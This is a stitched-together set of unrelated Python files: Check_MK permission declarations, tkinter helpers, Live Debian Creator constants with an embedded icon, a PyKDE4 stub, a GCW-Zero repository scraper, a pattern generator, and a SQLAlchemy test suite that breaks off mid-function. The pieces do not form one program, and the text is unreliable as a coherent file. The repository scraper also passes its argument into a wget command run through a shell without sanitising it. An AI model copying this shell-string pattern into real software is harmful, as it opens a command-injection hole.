#   | Declare general permissions for Multisite                            |
#   '----------------------------------------------------------------------'

def load():
    global loaded_with_language
    if loaded_with_language == current_language:
        return

    config.declare_permission_section("general", _('General Permissions'), 10)

    config.declare_permission("general.use",
         _("Use Multisite at all"),
         _("Users without this permission are not let in at all"),
         [ "admin", "user", "guest" ])

    config.declare_permission("general.see_all",
         _("See all Nagios objects"),
         _("See all objects regardless of contacts and contact groups. "
           "If combined with 'perform commands' then commands may be done on all objects."),
         [ "admin", "guest" ])

    declare_visual_permissions('views', _("views"))
    declare_visual_permissions('dashboards', _("dashboards"))

    config.declare_permission("general.view_option_columns",
         _("Change view display columns"),
         _("Interactively change the number of columns being displayed by a view (does not edit or customize the view)"),
         [ "admin", "user", "guest" ])

    config.declare_permission("general.view_option_refresh",
         _("Change view display refresh"),
         _("Interactively change the automatic browser reload of a view being displayed (does not edit or customize the view)"),
         [ "admin", "user" ])

    config.declare_permission("general.painter_options",
         _("Change column display options"),
         _("Some of the display columns offer options for customizing their output. "
         "For example time stamp columns can be displayed absolute, relative or "
         "in a mixed style. This permission allows the user to modify display options"),
         [ "admin", "user", "guest" ])

    config.declare_permission("general.act",
         _("Perform commands"),
         _("Allows users to perform Nagios commands. If no further permissions "
           "are granted, actions can only be done on objects one is a contact for"),
         [ "admin", "user" ])

    config.declare_permission("general.see_sidebar",
         _("Use Check_MK sidebar"),
         _("Without this permission the Check_MK sidebar will be invisible"),
         [ "admin", "user", "guest" ])

    config.declare_permission("general.configure_sidebar",
         _("Configure sidebar"),
         _("This allows the user to add, move and remove sidebar snapins."),
         [ "admin", "user" ])

    config.declare_permission('general.edit_profile',
        _('Edit the user profile'),
        _('Permits the user to change the user profile settings.'),
        [ 'admin', 'user' ]
    )

    config.declare_permission('general.edit_notifications',
        _('Edit personal notification settings'),
        _('This allows a user to edit his personal notification settings. You also need the permission '
          '<i>Edit the user profile</i> in order to do this.'),
        [ 'admin', 'user' ]
    )

    config.declare_permission('general.disable_notifications',
        _('Disable all personal notifications'),
        _('This permissions provides a checkbox in the personal settings of the user that '
          'allows him to completely disable all of his notifications. Use with caution.'),
        [ 'admin', ]
    )

    config.declare_permission('general.edit_user_attributes',
        _('Edit personal user attributes'),
        _('This allows a user to edit his personal user attributes. You also need the permission '
          '<i>Edit the user profile</i> in order to do this.'),
        [ 'admin', 'user' ]
    )

    config.declare_permission('general.change_password',
        _('Edit the user password'),
        _('Permits the user to change the password.'),
        [ 'admin', 'user' ]
    )

    config.declare_permission('general.logout',
        _('Logout'),
        _('Permits the user to logout.'),
        [ 'admin', 'user', 'guest' ]
    )

    config.declare_permission("general.ignore_soft_limit",
         _("Ignore soft query limit"),
         _("Allows to ignore the soft query limit imposed upon the number of datasets returned by a query"),
         [ "admin", "user" ])

    config.declare_permission("general.ignore_hard_limit",
         _("Ignore hard query limit"),
         _("Allows to ignore the hard query limit imposed upon the number of datasets returned by a query"),
         [ "admin" ])

    loaded_with_language = current_language

# TODO: This has been obsoleted by pagetypes.py
def declare_visual_permissions(what, what_plural):
    config.declare_permission("general.edit_" + what,
         _("Customize %s and use them") % what_plural,
         _("Allows to create own %s, customize builtin %s and use them.") % (what_plural, what_plural),
         [ "admin", "user" ])

    config.declare_permission("general.publish_" + what,
         _("Publish %s") % what_plural,
         _("Make %s visible and usable for other users.") % what_plural,
         [ "admin", "user" ])

    config.declare_permission("general.see_user_" + what,
         _("See user %s") % what_plural,
         _("Is needed for seeing %s that other users have created.") % what_plural,
         [ "admin", "user", "guest" ])

    config.declare_permission("general.force_" + what,
         _("Modify builtin %s") % what_plural,
         _("Make own published %s override builtin %s for all users.") % (what_plural, what_plural),
         [ "admin" ])

    config.declare_permission("general.delete_foreign_" + what,
         _("Delete foreign %s") % what_plural,
         _("Allows to delete %s created by other users.") % what_plural,
         [ "admin" ])

import tkinter

FRAME_BORDER = 5


class PageView(object):
    __root = None

    bd = None

    def __init__(self, root=None, main_frame=None):
        param = self.params()
        if root is None:
            # standalone
            self.__root = tkinter.Tk()
            self.__root.title(param['title'])
            self.__root.geometry('%sx%s+%s+%s' % (param['w'],
                                                  param['h'],
                                                  param['x'],
                                                  param['y']
                                                  ))
        else:
            # inside
            self.__root = root

        self.bd = param['bd']

        if main_frame is None:
            # standalone
            main_f = tkinter.Frame(master=self.__root, bg='black', bd=self.bd)
            main_f.pack(fill='both', expand=True)
        else:
            # inside
            main_f = main_frame

        self.make_widgets(main_f)

    @property
    def root(self):
        return self.__root

    def close(self):
        self.__root.destroy()
        self.__root.quit()

    # Override
    def make_widgets(self, main_frame):
        pass

    # Override
    def params(self):
        param = {
            'x': 0,
            'y': 0,
            'w': 500,
            'h': 500,
            'title': '% Type Prog Title Here %',
        }
        return param


def mk_scrollable_area(obj, obj_frame, sbars):
    obj.grid(row=0, column=0, sticky='NSWE')

    if 'y' in sbars:
        y_scrollbar = tkinter.ttk.Scrollbar(obj_frame)
        y_scrollbar.grid(row=0, column=1, sticky='NS')
        y_scrollbar['command'] = obj.yview
        obj['yscrollcommand'] = y_scrollbar.set
    if 'x' in sbars:
        x_scrollbar = tkinter.ttk.Scrollbar(obj_frame, orient='horizontal')
        x_scrollbar.grid(row=1, column=0, sticky='WE')
        x_scrollbar['command'] = obj.xview
        obj['xscrollcommand'] = x_scrollbar.set

    obj_frame.columnconfigure(1, 'minsize')
    obj_frame.columnconfigure(0, weight=1)
    obj_frame.rowconfigure(1, 'minsize')
    obj_frame.rowconfigure(0, weight=1)


def mk_listbox(frame, side='top', sbars='y', sel_mode=tkinter.EXTENDED):
    BORDER = 0
    COLOR = 'grey'

    listbox_frame = tkinter.Frame(frame, bg=COLOR, bd=BORDER)
    listbox_frame.pack(side=side, fill='both', expand=True)

    listbox = tkinter.Listbox(listbox_frame, selectmode=sel_mode)
    mk_scrollable_area(listbox, listbox_frame, sbars)
    return listbox


def mk_treeview(frame, side='top', sbars='y'):
    BORDER = 0
    COLOR = 'grey'

    treeview_frame = tkinter.Frame(frame, bg=COLOR, bd=BORDER)
    treeview_frame.pack(side=side, fill='both', expand=True)

    treeview = tkinter.ttk.Treeview(treeview_frame)
    mk_scrollable_area(treeview, treeview_frame, sbars)

    return treeview


import os, socket, sys, urllib

from wx.lib.embeddedimage import PyEmbeddedImage

ldc_name = "Live Debian Creator"
ldc_cli_version = "1.4.0"
ldc_gui_version = "1.11.0"

if (sys.platform == "win32"):
    slash = "\\"
    if os.path.isfile(sys.path[0]): #fix for compiled binaries
        homepath = os.path.dirname(sys.path[0]) + slash
    else:
        homepath = sys.path[0] + slash
else:
    slash = "/"

#socket.setdefaulttimeout(10)

def defineBrowserAgent(uiname, uiversion):
    class AppURLopener(urllib.FancyURLopener):
        version = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
        #version = uiname + " " + uiversion + " / " + sys.platform
    urllib._urlopener = AppURLopener()

bookico = PyEmbeddedImage(
    "iVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAABHNCSVQICAgIfAhkiAAABPZJ"
    "REFUWIWtl09sFFUcxz/iYN+YTZyNxewiTWiV6FZQtqhkN3pgGw6UW6unJVxEDtaThJMc9WLg"
    "oj1hwJhANURqQkw9NGwTla0c6JqArELSMVCzi63uKJX5UR7Bw8x0Z2d3yxJ5yctM3vu93/f7"
    "+ztv4CGPqamp9A/nL2Q6lTceBqht26pw7kL+7K+10S/tJ9OpBBPASCdnH/k/wFNTU+nzc/+M"
    "2v925a2N21Sq1yKJg/wxV7XWyIHBnYPjD53A9PS0mrv+e/6yw6gT60+72iK7AVJJSBoCBihD"
    "AVC6WK7O3bx3+thFyY30ycSH7+w5FNXXcQgymUzaei49+vHMX/kq/SqpYGiDRbYHlBFoigMu"
    "gklxHsZ1NlG4yygvKiruWauV3vsS2L59e+qZVwfHqsnB3G8LkI2ZHHzdImGBaZi+BgVaqIhi"
    "sqo4uQBlrQDPI2jx5gMQUFu39A3veW3ru9leMmO19aQ2JDm8C5SCuDJBgUJRM6DkKE5WFYUF"
    "cLSAxgOnNeiqBHZt6z2wO2UdSvXGrfimFNYrIzhHbca/LlOcTzL0coJsj8IRKC4pJhfAXvKB"
    "dKBFQu+AdjsnsG/AOpzc+RZWKkc8FgcFGDYApas1SgtAUjxXJOK+a1XUgRHrzc4JlMslqB5C"
    "ZYbg+Sws2rAYByPlSQcntNQtNSLaNGCoxv07HRJAQ63ioM6MI2fGPdt6DngKDbVK1kS9IKBV"
    "PQmN6P4qBNAgGlw/jqJp9vKKBtVILrA4nA+GegAPBCT8Z0P6RF0dvAfgwdRRIu2rYfU+sLKr"
    "mtcCq3UIPGyABmupzIBRoOIkuXzF7oyACq2KDne5FmQC2fC+UyWtZxmIlchtseg1sti2yzf2"
    "z8n8559kdmzbYW/evLnalgAGmLr+Lp00aw3WYomUUaDfKpNJphmIDWEZXvd1N9m80HNj+Fs5"
    "Pvx0TY0AE6sQUGB45SOA0m0kwyWnHfLdh8nGd5NJDGMqEwyXoi5QXJrAltmVsNxabq2mrWVi"
    "qHoitkpCBJwKp6uTVDbaVGKziK5wWWaQoAOGu2IbO5pGkLfuKocD5WrJwVRQXirjXC+DAdY6"
    "1ZSYCng8cnxNk8K1fukF/eA+FqAFpIaiMT0VXgIr5fcohUfosca23EzgTh3cDep5taFdcCN1"
    "bviAMTB98OZqakfAH65vx4rqKBlNm2+8grUeWGCrGW5S9yWwti7ofW5Ucx9rIBK6bIRB2lVN"
    "Y29tQcBonG4Ta6k/NSBeDkSH2Sp0GoiUYYsQ+AB+0rTt4hov/lpQ0lrKDT/F66y3IjLN9rmh"
    "VQVo1b4StHgkWhAIEjioKBFfx91GFzR5wJ5HRINpem3YQfzyklAihgCjxDT1SvLvLLLkR0rA"
    "jdzOmjxwotbVf656+/20YmS9wrIfvSdO8p53A0UAM0RihVqIjNSB/WXRIFpwXVhebgxCkwdu"
    "/33b/kXY94VD/KWPjvY9lduVvaWxCVzYYipxW1eKFhwRajcdat9RemP+vd2jbx6cCIt19Gf0"
    "6fETw28fKR6jf9Ci24LuuFeuMWC2IIlLXxVl70+5ZDckuxWuFuIxqIjgTDOjzvV9UC7OTbbS"
    "3fGvmW3bauyzE/nCFXe4dIMsy45tVX889oT+83RXV5d5bf21MXIyZD3re2WGgnyfOFK9VG0J"
    "/MAEOhmnTp1KXF28mlsXWzezf+/+1legyPgPTicVRBS2XfsAAAAASUVORK5CYII=")
getbookicoIcon = bookico.GetIcon
# encoding: utf-8
# module PyKDE4.kdeui
# from /usr/lib/python3/dist-packages/PyKDE4/kdeui.cpython-34m-x86_64-linux-gnu.so
# by generator 1.135
# no doc

# imports
import PyKDE4.kdecore as __PyKDE4_kdecore
import PyQt4.QtCore as __PyQt4_QtCore
import PyQt4.QtGui as __PyQt4_QtGui
import PyQt4.QtSvg as __PyQt4_QtSvg


class KPassivePopupMessageHandler(__PyQt4_QtCore.QObject, __PyKDE4_kdecore.KMessageHandler):
    # no doc
    def message(self, *args, **kwargs): # real signature unknown
        pass

    def __init__(self, *args, **kwargs): # real signature unknown
        pass



#!/usr/bin/python
#CHANGE ONLY, IF YOU KNOW, WHAT YOU DO!
#OPKMANAGER WILL CRASH IF YOUR OUTPUT IS INVALID!
import subprocess
import argparse
import time
import calendar
import string
import sys

class RegisterAction(argparse.Action):
	def __call__(self, parser, namespace, values, option_string=None):
		print "Official Repository" # Name
		print "web" # Type (maybe web for web, or anything else for usb)
		print "http://www.gcw-zero.com/files/upload/opk/" #URL
		print "official.py --update" #Call for updating the list
		print "O" #letter to show

class UpdateAction(argparse.Action):
	def __call__(self, parser, namespace, values, option_string=None):
		process = subprocess.Popen('wget --timeout='+str(values[0])+' -qO- http://ziz.gp2x.de/gcw-repos/count.php',stdout=subprocess.PIPE,shell=True)
		process = subprocess.Popen('wget --timeout='+str(values[0])+' -qO- http://www.gcw-zero.com/downloads',stdout=subprocess.PIPE,shell=True)
		#process = subprocess.Popen('wget --timeout='+str(values[0])+' -qO- http://ziz.gp2x.de/temp/test.htm',stdout=subprocess.PIPE,shell=True)
		#process = subprocess.Popen('cat downloads',stdout=subprocess.PIPE,shell=True)
		output = process.stdout.read().split('<div class="downloads_overview">')
		for output_part in output:
			part = output_part.split('\n')
			line_number = 0;
			not_found = 1;
			while (line_number < len(part)):
				if (part[line_number].strip().startswith('<span class="downloads_title">')):
					not_found = 0;
					break;
				line_number += 1;
			if not_found:
				continue;
			program_name_description = part[line_number];
			name = program_name_description.split('>')[1].split('<')[0];
			if (name == ""):
				continue
			line_number = 0;
			not_found = 1;
			while (line_number < len(part)):
				if (part[line_number].strip().startswith('<a class="downloads_link"')):
					not_found = 0;
					break;
				line_number += 1;
			if not_found:
				continue;
			filename = part[line_number].split('href="file.php?file=')[1].split('">')[0];
			print "["+name+"]"
			description = program_name_description.split('>')[3];
			print "description: "+description
			print "filename: " + filename
			l = len(part)
			found_version = 0
			found_image = 0
			found_long = 0;
			for i in range(0,l-1):
				if string.find(part[i],'Publication Date') != -1:
					version = part[i+1]
					version = version.split('>')[1]
					version = version.split('<')[0]
					t = time.strptime(version,"%A, %d %b %Y")
					print "version: " + str(calendar.timegm(t)) #NEEDED!
					found_version = 1
				if string.find(part[i],'<div class="downloads_preview"') != -1:
					image = part[i];
					image = image.split("background-image: url('")[1].split("');")[0];
					print "image_url: http://www.gcw-zero.com/" + image
				if string.find(part[i],'<p class="more fade">') != -1:
					long_description = part[i];
					long_description = long_description.split('<p class="more fade">')[1].split("</p>")[0];
					long_description = long_description.replace('<br /> ','\\n')
					long_description = long_description.split('>')
					sys.stdout.write("long_description: ")
					for long_description_part in long_description:
						sys.stdout.write(long_description_part.split('<')[0])
					sys.stdout.write('\n')
					found_long = 1
				if (found_version and found_image and found_long):
					break
			print ""


def main():
	parser = argparse.ArgumentParser(description="Ziz's Repository script")
	parser.add_argument('--register', nargs=0, action=RegisterAction)
	parser.add_argument('--update', nargs=1, action=UpdateAction)
	args = parser.parse_args()

if __name__ == "__main__":
	main()

#!/usr/bin/env python

####################################
#
# --- TEXTPATGEN TEMPLATE ---
#
# Users can change the output by editing
# this file directly.
#
####################################

import sys

sys.stdout.write('####################################\n')
sys.stdout.write('#\n')
sys.stdout.write('# -- TEXTPATGEN GENERATED FILE --\n')
sys.stdout.write('#\n')
sys.stdout.write('# -- Created from a Python script.\n')
sys.stdout.write('#\n')
sys.stdout.write("####################################\n")
num=0
for length in range(0, 16):
  for width in range(0, 15):
    sys.stdout.write('X-%04X ' % num)
    num=num+1
    width=width+1
    length=length+1
  sys.stdout.write('X-%04X\n' % num)
  num=num+1
sys.stdout.write('# -- End of file.\n');
sys.stdout.flush()

from .. import config
from .. import fixtures
from ..assertions import eq_
from ..assertions import in_
from ..schema import Column
from ..schema import Table
from ... import bindparam
from ... import case
from ... import Computed
from ... import exists
from ... import false
from ... import func
from ... import Integer
from ... import literal
from ... import literal_column
from ... import null
from ... import select
from ... import String
from ... import testing
from ... import text
from ... import true
from ... import tuple_
from ... import union
from ... import util


class CollateTest(fixtures.TablesTest):
    __backend__ = True

    @classmethod
    def define_tables(cls, metadata):
        Table(
            "some_table",
            metadata,
            Column("id", Integer, primary_key=True),
            Column("data", String(100)),
        )

    @classmethod
    def insert_data(cls, connection):
        connection.execute(
            cls.tables.some_table.insert(),
            [
                {"id": 1, "data": "collate data1"},
                {"id": 2, "data": "collate data2"},
            ],
        )

    def _assert_result(self, select, result):
        eq_(config.db.execute(select).fetchall(), result)

    @testing.requires.order_by_collation
    def test_collate_order_by(self):
        collation = testing.requires.get_order_by_collation(testing.config)

        self._assert_result(
            select([self.tables.some_table]).order_by(
                self.tables.some_table.c.data.collate(collation).asc()
            ),
            [(1, "collate data1"), (2, "collate data2")],
        )


class OrderByLabelTest(fixtures.TablesTest):
    """Test the dialect sends appropriate ORDER BY expressions when
    labels are used.

    This essentially exercises the "supports_simple_order_by_label"
    setting.

    """

    __backend__ = True

    @classmethod
    def define_tables(cls, metadata):
        Table(
            "some_table",
            metadata,
            Column("id", Integer, primary_key=True),
            Column("x", Integer),
            Column("y", Integer),
            Column("q", String(50)),
            Column("p", String(50)),
        )

    @classmethod
    def insert_data(cls, connection):
        connection.execute(
            cls.tables.some_table.insert(),
            [
                {"id": 1, "x": 1, "y": 2, "q": "q1", "p": "p3"},
                {"id": 2, "x": 2, "y": 3, "q": "q2", "p": "p2"},
                {"id": 3, "x": 3, "y": 4, "q": "q3", "p": "p1"},
            ],
        )

    def _assert_result(self, select, result):
        eq_(config.db.execute(select).fetchall(), result)

    def test_plain(self):
        table = self.tables.some_table
        lx = table.c.x.label("lx")
        self._assert_result(select([lx]).order_by(lx), [(1,), (2,), (3,)])

    def test_composed_int(self):
        table = self.tables.some_table
        lx = (table.c.x + table.c.y).label("lx")
        self._assert_result(select([lx]).order_by(lx), [(3,), (5,), (7,)])

    def test_composed_multiple(self):
        table = self.tables.some_table
        lx = (table.c.x + table.c.y).label("lx")
        ly = (func.lower(table.c.q) + table.c.p).label("ly")
        self._assert_result(
            select([lx, ly]).order_by(lx, ly.desc()),
            [(3, util.u("q1p3")), (5, util.u("q2p2")), (7, util.u("q3p1"))],
        )

    def test_plain_desc(self):
        table = self.tables.some_table
        lx = table.c.x.label("lx")
        self._assert_result(
            select([lx]).order_by(lx.desc()), [(3,), (2,), (1,)]
        )

    def test_composed_int_desc(self):
        table = self.tables.some_table
        lx = (table.c.x + table.c.y).label("lx")
        self._assert_result(
            select([lx]).order_by(lx.desc()), [(7,), (5,), (3,)]
        )

    @testing.requires.group_by_complex_expression
    def test_group_by_composed(self):
        table = self.tables.some_table
        expr = (table.c.x + table.c.y).label("lx")
        stmt = (
            select([func.count(table.c.id), expr])
            .group_by(expr)
            .order_by(expr)
        )
        self._assert_result(stmt, [(1, 3), (1, 5), (1, 7)])


class LimitOffsetTest(fixtures.TablesTest):
    __backend__ = True

    @classmethod
    def define_tables(cls, metadata):
        Table(
            "some_table",
            metadata,
            Column("id", Integer, primary_key=True),
            Column("x", Integer),
            Column("y", Integer),
        )

    @classmethod
    def insert_data(cls, connection):
        connection.execute(
            cls.tables.some_table.insert(),
            [
                {"id": 1, "x": 1, "y": 2},
                {"id": 2, "x": 2, "y": 3},
                {"id": 3, "x": 3, "y": 4},
                {"id": 4, "x": 4, "y": 5},
            ],
        )

    def _assert_result(self, select, result, params=()):
        eq_(config.db.execute(select, params).fetchall(), result)

    def test_simple_limit(self):
        table = self.tables.some_table
        self._assert_result(
            select([table]).order_by(table.c.id).limit(2),
            [(1, 1, 2), (2, 2, 3)],
        )

    @testing.requires.offset
    def test_simple_offset(self):
        table = self.tables.some_table
        self._assert_result(
            select([table]).order_by(table.c.id).offset(2),
            [(3, 3, 4), (4, 4, 5)],
        )

    @testing.requires.offset
    def test_simple_limit_offset(self):
        table = self.tables.some_table
        self._assert_result(
            select([table]).order_by(table.c.id).limit(2).offset(1),
            [(2, 2, 3), (3, 3, 4)],
        )

    @testing.requires.offset
    def test_limit_offset_nobinds(self):
        """test that 'literal binds' mode works - no bound params."""

        table = self.tables.some_table
        stmt = select([table]).order_by(table.c.id).limit(2).offset(1)
        sql = stmt.compile(
            dialect=config.db.dialect, compile_kwargs={"literal_binds": True}
        )
        sql = str(sql)

        self._assert_result(sql, [(2, 2, 3), (3, 3, 4)])

    @testing.requires.bound_limit_offset
    def test_bound_limit(self):
        table = self.tables.some_table
        self._assert_result(
            select([table]).order_by(table.c.id).limit(bindparam("l")),
            [(1, 1, 2), (2, 2, 3)],
            params={"l": 2},
        )

    @testing.requires.bound_limit_offset
    def test_bound_offset(self):
        table = self.tables.some_table
        self._assert_result(
            select([table]).order_by(table.c.id).offset(bindparam("o")),
            [(3, 3, 4), (4, 4, 5)],
            params={"o": 2},
        )

    @testing.requires.bound_limit_offset
    def test_bound_limit_offset(self):
        table = self.tables.some_table
        self._assert_result(
            select([table])
            .order_by(table.c.id)
            .limit(bindparam("l"))
            .offset(bindparam("o")),
            [(2, 2, 3), (3, 3, 4)],
            params={"l": 2, "o": 1},
        )


class CompoundSelectTest(fixtures.TablesTest):
    __backend__ = True

    @classmethod
    def define_tables(cls, metadata):
        Table(
            "some_table",
            metadata,
            Column("id", Integer, primary_key=True),
            Column("x", Integer),
            Column("y", Integer),
        )

    @classmethod
    def insert_data(cls, connection):
        connection.execute(
            cls.tables.some_table.insert(),
            [
                {"id": 1, "x": 1, "y": 2},
                {"id": 2, "x": 2, "y": 3},
                {"id": 3, "x": 3, "y": 4},
                {"id": 4, "x": 4, "y": 5},
            ],
        )

    def _assert_result(self, select, result, params=()):
        eq_(config.db.execute(select, params).fetchall(), result)

    def test_plain_union(self):
        table = self.tables.some_table
        s1 = select([table]).where(table.c.id == 2)
        s2 = select([table]).where(table.c.id == 3)

        u1 = union(s1, s2)
        self._assert_result(u1.order_by(u1.c.id), [(2, 2, 3), (3, 3, 4)])

    def test_select_from_plain_union(self):
        table = self.tables.some_table
        s1 = select([table]).where(table.c.id == 2)
        s2 = select([table]).where(table.c.id == 3)

        u1 = union(s1, s2).alias().select()
        self._assert_result(u1.order_by(u1.c.id), [(2, 2, 3), (3, 3, 4)])

    @testing.requires.order_by_col_from_union
    @testing.requires.parens_in_union_contained_select_w_limit_offset
    def test_limit_offset_selectable_in_unions(self):
        table = self.tables.some_table
        s1 = (
            select([table])
            .where(table.c.id == 2)
            .limit(1)
            .order_by(table.c.id)
        )
        s2 = (
            select([table])
            .where(table.c.id == 3)
            .limit(1)
            .order_by(table.c.id)
        )

        u1 = union(s1, s2).limit(2)
        self._assert_result(u1.order_by(u1.c.id), [(2, 2, 3), (3, 3, 4)])

    @testing.requires.parens_in_union_contained_select_wo_limit_offset
    def test_order_by_selectable_in_unions(self):
        table = self.tables.some_table
        s1 = select([table]).where(table.c.id == 2).order_by(table.c.id)
        s2 = select([table]).where(table.c.id == 3).order_by(table.c.id)

        u1 = union(s1, s2).limit(2)
        self._assert_result(u1.order_by(u1.c.id), [(2, 2, 3), (3, 3, 4)])

    def test_distinct_selectable_in_unions(self):
        table = self.tables.some_table
        s1 = select([table]).where(table.c.id == 2).distinct()
        s2 = select([table]).where(table.c.id == 3).distinct()

        u1 = union(s1, s2).limit(2)
        self._assert_result(u1.order_by(u1.c.id), [(2, 2, 3), (3, 3, 4)])

    @testing.requires.parens_in_union_contained_select_w_limit_offset
    def test_limit_offset_in_unions_from_alias(self):
        table = self.tables.some_table
        s1 = (
            select([table])
            .where(table.c.id == 2)
            .limit(1)
            .order_by(table.c.id)
        )
        s2 = (
            select([table])
            .where(table.c.id == 3)
            .limit(1)
            .order_by(table.c.id)
        )

        # this necessarily has double parens
        u1 = union(s1, s2).alias()
        self._assert_result(
            u1.select().limit(2).order_by(u1.c.id), [(2, 2, 3), (3, 3, 4)]
        )

    def test_limit_offset_aliased_selectable_in_unions(self):
        table = self.tables.some_table
        s1 = (
            select([table])
            .where(table.c.id == 2)
            .limit(1)
            .order_by(table.c.id)
            .alias()
            .select()
        )
        s2 = (
            select([table])
            .where(table.c.id == 3)
            .limit(1)
            .order_by(table.c.id)
            .alias()
            .select()
        )

        u1 = union(s1, s2).limit(2)
        self._assert_result(u1.order_by(u1.c.id), [(2, 2, 3), (3, 3, 4)])


class ExpandingBoundInTest(fixtures.TablesTest):
    __backend__ = True

    @classmethod
    def define_tables(cls, metadata):
        Table(
            "some_table",
            metadata,
            Column("id", Integer, primary_key=True),
            Column("x", Integer),
            Column("y", Integer),
            Column("z", String(50)),
        )

    @classmethod
    def insert_data(cls, connection):
        connection.execute(
            cls.tables.some_table.insert(),
            [
                {"id": 1, "x": 1, "y": 2, "z": "z1"},
                {"id": 2, "x": 2, "y": 3, "z": "z2"},
                {"id": 3, "x": 3, "y": 4, "z": "z3"},
                {"id": 4, "x": 4, "y": 5, "z": "z4"},
            ],
        )

    def _assert_result(self, select, result, params=()):
        eq_(config.db.execute(select, params).fetchall(), result)

    def test_multiple_empty_sets(self):
        # test that any anonymous aliasing used by the dialect
        # is fine with duplicates
        table = self.tables.some_table

        stmt = (
            select([table.c.id])
            .where(table.c.x.in_(bindparam("q", expanding=True)))
            .where(table.c.y.in_(bindparam("p", expanding=True)))
            .order_by(table.c.id)
        )

        self._assert_result(stmt, [], params={"q": [], "p": []})

    @testing.requires.tuple_in
    def test_empty_heterogeneous_tuples(self):
        table = self.tables.some_table

        stmt = (
            select([table.c.id])
            .where(
                tuple_(table.c.x, table.c.z).in_(
                    bindparam("q", expanding=True)
                )
            )
            .order_by(table.c.id)
        )

        self._assert_result(stmt, [], params={"q": []})

    @testing.requires.tuple_in
    def test_empty_homogeneous_tuples(self):
        table = self.tables.some_table

        stmt = (
            select([table.c.id])
            .where(
                tuple_(table.c.x, table.c.y).in_(
                    bindparam("q", expanding=True)
                )
            )
            .order_by(table.c.id)
        )

        self._assert_result(stmt, [], params={"q": []})

    def test_bound_in_scalar(self):
        table = self.tables.some_table

        stmt = (
            select([table.c.id])
            .where(table.c.x.in_(bindparam("q", expanding=True)))
            .order_by(table.c.id)
        )

        self._assert_result(stmt, [(2,), (3,), (4,)], params={"q": [2, 3, 4]})

    @testing.requires.tuple_in
    def test_bound_in_two_tuple(self):
        table = self.tables.some_table

        stmt = (
            select([table.c.id])
            .where(
                tuple_(table.c.x, table.c.y).in_(
                    bindparam("q", expanding=True)
                )
            )
            .order_by(table.c.id)
        )

        self._assert_result(
            stmt, [(2,), (3,), (4,)], params={"q": [(2, 3), (3, 4), (4, 5)]}
        )

    @testing.requires.tuple_in
    def test_bound_in_heterogeneous_two_tuple(self):
        table = self.tables.some_table

        stmt = (
            select([table.c.id])
            .where(
                tuple_(table.c.x, table.c.z).in_(
                    bindparam("q", expanding=True)
                )
            )
            .order_by(table.c.id)
        )

        self._assert_result(
            stmt,
            [(2,), (3,), (4,)],
            params={"q": [(2, "z2"), (3, "z3"), (4, "z4")]},
        )

    def test_empty_set_against_integer(self):
        table = self.tables.some_table

        stmt = (
            select([table.c.id])
            .where(table.c.x.in_(bindparam("q", expanding=True)))
            .order_by(table.c.id)
        )

        self._assert_result(stmt, [], params={"q": []})

    def test_empty_set_against_integer_negation(self):
        table = self.tables.some_table

        stmt = (
            select([table.c.id])
            .where(table.c.x.notin_(bindparam("q", expanding=True)))
            .order_by(table.c.id)
        )

        self._assert_result(stmt, [(1,), (2,), (3,), (4,)], params={"q": []})

    def test_empty_set_against_string(self):
        table = self.tables.some_table

        stmt = (
            select([table.c.id])
            .where(table.c.z.in_(bindparam("q", expanding=True)))
            .order_by(table.c.id)
        )

        self._assert_result(stmt, [], params={"q": []})

    def test_empty_set_against_string_negation(self):
        table = self.tables.some_table

        stmt = (
            select([table.c.id])
            .where(table.c.z.notin_(bindparam("q", expanding=True)))
            .order_by(table.c.id)
        )

        self._assert_result(stmt, [(1,), (2,), (3,), (4,)], params={"q": []})

    def test_null_in_empty_set_is_false(self):
        stmt = select(
            [
                case(
                    [
                        (
                            null().in_(
                                bindparam("foo", value=(), expanding=True)
                            ),
                            true(),
                        )
                    ],
                    else_=false(),
                )
            ]
        )
        in_(config.db.execute(stmt).fetchone()[0], (False, 0))


class LikeFunctionsTest(fixtures.TablesTest):
    """Round trips for startswith/endswith/contains with escape options."""

    __backend__ = True

    run_inserts = "once"
    run_deletes = None

    @classmethod
    def define_tables(cls, metadata):
        Table(
            "some_table",
            metadata,
            Column("id", Integer, primary_key=True),
            Column("data", String(50)),
        )

    @classmethod
    def insert_data(cls, connection):
        rows = [
            {"id": 1, "data": "abcdefg"},
            {"id": 2, "data": "ab/cdefg"},
            {"id": 3, "data": "ab%cdefg"},
            {"id": 4, "data": "ab_cdefg"},
            {"id": 5, "data": "abcde/fg"},
            {"id": 6, "data": "abcde%fg"},
            {"id": 7, "data": "ab#cdefg"},
            {"id": 8, "data": "ab9cdefg"},
            {"id": 9, "data": "abcde#fg"},
            {"id": 10, "data": "abcd9fg"},
        ]
        connection.execute(cls.tables.some_table.insert(), rows)

    def _test(self, expr, expected):
        """SELECT the ids matching *expr* and compare the set to *expected*."""
        stmt = select([self.tables.some_table.c.id]).where(expr)
        with config.db.connect() as conn:
            found = {row_id for row_id, in conn.execute(stmt)}
        eq_(found, expected)

    def test_startswith_unescaped(self):
        data = self.tables.some_table.c.data
        self._test(data.startswith("ab%c"), {1, 2, 3, 4, 5, 6, 7, 8, 9, 10})

    def test_startswith_autoescape(self):
        data = self.tables.some_table.c.data
        self._test(data.startswith("ab%c", autoescape=True), {3})

    def test_startswith_sqlexpr(self):
        data = self.tables.some_table.c.data
        self._test(
            data.startswith(literal_column("'ab%c'")),
            {1, 2, 3, 4, 5, 6, 7, 8, 9, 10},
        )

    def test_startswith_escape(self):
        data = self.tables.some_table.c.data
        self._test(data.startswith("ab##c", escape="#"), {7})

    def test_startswith_autoescape_escape(self):
        data = self.tables.some_table.c.data
        self._test(data.startswith("ab%c", autoescape=True, escape="#"), {3})
        self._test(data.startswith("ab#c", autoescape=True, escape="#"), {7})

    def test_endswith_unescaped(self):
        data = self.tables.some_table.c.data
        self._test(data.endswith("e%fg"), {1, 2, 3, 4, 5, 6, 7, 8, 9})

    def test_endswith_sqlexpr(self):
        data = self.tables.some_table.c.data
        self._test(
            data.endswith(literal_column("'e%fg'")), {1, 2, 3, 4, 5, 6, 7, 8, 9}
        )

    def test_endswith_autoescape(self):
        data = self.tables.some_table.c.data
        self._test(data.endswith("e%fg", autoescape=True), {6})

    def test_endswith_escape(self):
        data = self.tables.some_table.c.data
        self._test(data.endswith("e##fg", escape="#"), {9})

    def test_endswith_autoescape_escape(self):
        data = self.tables.some_table.c.data
        self._test(data.endswith("e%fg", autoescape=True, escape="#"), {6})
        self._test(data.endswith("e#fg", autoescape=True, escape="#"), {9})

    def test_contains_unescaped(self):
